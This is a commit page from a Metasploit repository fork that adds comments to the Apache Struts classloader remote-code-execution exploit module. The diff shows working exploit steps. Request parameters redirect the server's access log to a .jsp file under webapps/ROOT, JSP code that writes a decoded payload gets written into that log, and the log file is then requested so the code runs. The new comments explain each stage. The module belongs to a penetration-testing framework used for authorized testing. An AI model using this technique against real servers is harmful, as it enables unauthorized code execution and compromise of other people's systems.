adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add comments

Browse Source
This commit is contained in:
julianvilas
2014-04-29 11:24:17 +02:00
parent a78aae08cf
commit b2c2245aff
1 changed files with 9 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/struts_code_exec_classloader.rb
+9 -4
View File
@@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
date_format = rand_text_numeric(1+rand(4))
vprint_status("#{peer} - Modifying class loader")
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT")
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}")
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp")
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}")
# Modifies classLoader parameters
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension
exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"
jsp_file = prefix_jsp
jsp_file << date_format
@@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
sleep(3)
# Inexistent URI that logs on previously created log file (with ".jsp" suffix)
uri = String.new(datastore['TARGETURI'])
uri << rand_text_alphanumeric(4+rand(4))
uri << "?"
@@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_file = rand_text_alphanumeric(4+rand(4))
register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
# Commands to be logged
exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>")
exec_cmd(uri, "<%@ page import=\"java.io.File\" %>")
@@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
# Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences
uri = "/"
uri << jsp_file